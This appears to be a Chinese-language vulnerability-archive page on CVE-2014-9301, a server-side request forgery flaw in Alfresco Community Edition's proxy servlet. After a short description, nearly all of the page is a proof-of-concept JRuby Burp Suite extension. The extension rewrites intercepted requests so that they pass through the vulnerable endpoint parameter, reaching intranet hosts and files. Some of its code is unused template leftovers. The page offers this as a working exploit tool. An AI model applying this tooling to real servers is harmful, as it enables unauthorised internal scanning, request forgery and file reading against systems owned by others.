# CVE-2014-9301 Alfresco Community Edition before 5.0.a 任意文件讀取漏洞
==INFO==
Server-side request forgery (SSRF) vulnerability in the proxy servlet in Alfresco Community Edition before 5.0.a allows remote attackers to trigger outbound requests to intranet servers, conduct port scans, and read arbitrary files via a crafted URI in the endpoint parameter.
==POC==
require 'java'
java_import 'burp.IBurpExtender'
java_import 'burp.IHttpListener'
java_import 'burp.IMessageEditorController'
class BurpExtender
include IBurpExtender, IHttpListener, IMessageEditorController
#
# implement IBurpExtender
#
def registerExtenderCallbacks(callbacks)
#@HOST_FROM = 'host1.example.org'
#@HOST_TO = 'host2.example.org'
# obtain an extension helpers object
@helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("Traffic redirector")
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
end
#
# implement IHttpListener
#
def processHttpMessage(toolFlag, messageIsRequest, messageInfo)
# only process requests
if (messageIsRequest)
# get the HTTP service for the request
httpService = messageInfo.getHttpService()
request = messageInfo.getRequest()
@root_path = nil unless request.to_s.lines.first.index('endpoint').nil?
referer = request.to_s.scan(/Referer: (.*)/)
referer.flatten!
referer =referer.first.scan(/(\/alfresco\/.*:\d+\/)(.*)/) rescue []
root_path = referer.flatten.first
relative_path = "/#{referer.flatten.last}"
if @root_path.nil? || @root_path.to_s != root_path
@root_path =root_path unless root_path.nil?
@relative_path = relative_path unless root_path.nil?
end
puts "INSTANCE_ROOT_PATH: #{@root_path}"
puts "Instance Relative_PATH: #{@relative_path}"
puts "ROOT_PATH: #{root_path}"
puts "Relative_PATH: #{relative_path}"
puts request.to_s.lines.first
new_req = request.to_s.sub("/alfresco/","/")
new_req = request if new_req.nil?
if new_req.to_s.lines.first.count('/')<3
print "Single dash "
puts new_req.to_s.lines.first
unless root_path == relative_path
rel = @relative_path.split("/")
rel[-1] = ""
new_req = new_req.to_s.sub("/", rel.join('/'))
end
end
new_req = new_req.to_s.sub("/", @root_path)
print "Final request "
puts new_req
messageInfo.setRequest(
@helpers.stringToBytes(new_req)
)
# if the host is HOST_FROM, change it to HOST_TO
#if (@HOST_FROM == httpService.getHost())
# messageInfo.setHttpService(
# @helpers.buildHttpService(
# @HOST_TO,
# httpService.getPort(),
# httpService.getProtocol()
# )
# )
#end
end
ensure
puts '----------------------'
end
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService()
return @currentlyDisplayedItem.getHttpService()
end
def getRequest()
return @currentlyDisplayedItem.getRequest()
end
def getResponse()
return @currentlyDisplayedItem.getResponse()
end
#
# getter / setters
#
def callbacks
@callbacks
end
def log
@log
end
def requestViewer
@requestViewer
end
def responseViewer
@responseViewer
end
def currentlyDisplayedItem=(currentlyDisplayedItem)
@currentlyDisplayedItem = currentlyDisplayedItem
end
end
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容